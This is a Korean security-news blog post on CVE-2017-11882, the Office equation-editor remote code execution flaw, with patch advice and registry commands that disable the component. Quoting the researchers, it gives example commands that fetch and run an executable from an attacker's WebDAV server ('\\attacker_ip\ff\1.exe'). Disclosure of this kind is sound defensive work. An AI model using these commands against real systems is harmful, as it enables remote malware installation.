상세 컨텐츠
본문
17-Year-Old MS Office Flaw Lets Hackers Install Malware Without User Interaction
MS 오피스에서 파일을 열 때 특별히 조심하셔야합니다.
사용자들이 MS의 내장 기능인 ‘패치 되지 않는’ DDE와 씨름하고 있는 도중, 연구원들이 또 다른 오피스 컴포넌트의 심각한 문제를 발견했습니다. 이는 공격자들이 타겟 컴퓨터에서 원격으로 멀웨어를 설치하도록 허용합니다.
이 취약점은 메모리 손상 문제이며, MS Office 365를 포함한 지난 17년간 출시 되어온 마이크로소프트 오피스의 모든 버전에 존재합니다. 또한 모든 최신 윈도우 10 Creators 업데이트를 포함한 모든 버전의 윈도우 OS에서 동작합니다.
이 취약점은 원격 코드 실행으로 이어지며, 인증 되지 않은 공격자가 원격으로 타겟 시스템에서 악성 코드를 실행할 수 있도록 허용합니다. 이 과정에서 사용자가 악성 문서를 오픈한 후에는 아무런 상호작용도 필요하지 않습니다.
CVE-2017-11882로 등록 된 이 취약점은 이는 문서에 방정식 (OLE 오브젝트)를 삽입하고 편집하는 MS Office의 컴포넌트인 EQNEDT32.EXE에 존재합니다.
<이미지 출처 : https://thehackernews.com/2017/11/microsoft-office-rce-exploit.html>
부적절한 메모리 운영으로 인해 이 컴포넌트가 메모리에서 오브젝트들을 적절히 처리하는데 실패해, 공격자가 로그인한 사용자 권한으로 악성 코드를 실행할 수 있도록 허용하게 됩니다.
17년 전, MS Office 2000에서 EQNEDT32.EXE가 도입 되었으며 이전 버전 문서의 호환을 위해 MS Office 2007 이후 공개 된 모든 버전에 이 컴포넌트가 포함 되었습니다.
이 취약점을 악용하기 위해서는, 취약한 MS Office나 MS WordPad를 사용해 특별히 제작한 악성 파일을 오픈해야합니다.
이 취약점은 CVE-2017-11847과 같은 윈도우 커널 권한 상승 익스플로잇과 함께 사용 될 경우 시스템 전체 제어 권한을 갖게 될 수 있습니다.
가능한 공격 시나리오는 아래와 같습니다:
연구원들은 아래와 같은 공격 시나리오들을 고안해냈습니다.
“이 취약점을 악용한 OLE 오브젝트 몇 개를 삽입함으로써, 임의의 명령을 실행할 수 있게 됩니다.(예: 임의의 파일을 인터넷으로부터 받은 후 실행)”
“임의의 코드를 실행하는 가장 쉬운 방법들 중 하나는 공격자가 제어하는 WebDAV 서버로부터 실행 파일을 다운받는 것입니다.”
“그렇지만 공격자는 이 취약점을 이용해 cmd.exe /c start \\attacker_ip\ff와 같은 명령어를 실행할 수 있게 됩니다. 익스플로잇의 일부로 이러한 명령어를 사용해 WebClient를 시작할 수 있습니다.”
“그 이후, 공격자는 \\attacker_ip\ff\1.exe 명령어를 사용해 WebDAV 서버로부터 실행 파일을 시작할 수 있습니다. 이 실행 파일의 시작 매커니즘은 \\live.sysinternals.com\tools 서비스와 유사합니다.”
MS 오피스 취약점으로부터 보호 하는 법
마이크로소프트는 이달 패치를 공개하면서 영향을 받은 소프트웨어가 메모리 내의 오브젝트를 처리하는 방식을 수정해 이 취약점을 수정했습니다.
따라서 사용자들은 11월 패치를 최대한 빨리 적용하기를 권고합니다.
이 컴포넌트에는 악용될 소지가 있는 다수의 보안 문제가 있으므로, 비활성화 하면 보안을 강화시킬 수 있습니다.
명령 프롬프트에서 아래의 명령어를 실행하면 윈도우 레지스트리에 해당 컴포넌트가 등록 되는 것을 방지할 수 있습니다:
reg add "HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
64비트 OS에서 32비트 MS Office 패키지를 사용한다면 아래의 명령어를 실행하면 됩니다:
reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
이 외에도, 사용자들은 Protected View(마이크로소프트 오피스 샌드박스)를 활성화해 활성 컨텐츠 (OLE/ActiveX/Macro) 실행을 막을 수 있습니다.
출처 :
https://thehackernews.com/2017/11/microsoft-office-rce-exploit.html
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882
'국내외 보안동향' 카테고리의 다른 글
| BankBot 플레이스토어에 돌아와 (0) | 2017.11.22 |
|---|---|
| 뱅킹 악성코드, 페이스북, 트위터 심지어 지메일 계정도 탈취할 수 있어 (0) | 2017.11.20 |
| OnePlus에서 부트로더를 잠금 해제 하지 않고도 Root 접근을 허용하는 백도어 발견 돼 (3) | 2017.11.15 |
| LockCrypt 랜섬웨어가 Satan RaaS를 통해 시작 돼, 변종 배포 시작 (0) | 2017.11.14 |
| Vault 8: 위키리크스, CIA의 멀웨어 제어 시스템인 Hive 소스 공개해 (0) | 2017.11.13 |
댓글 영역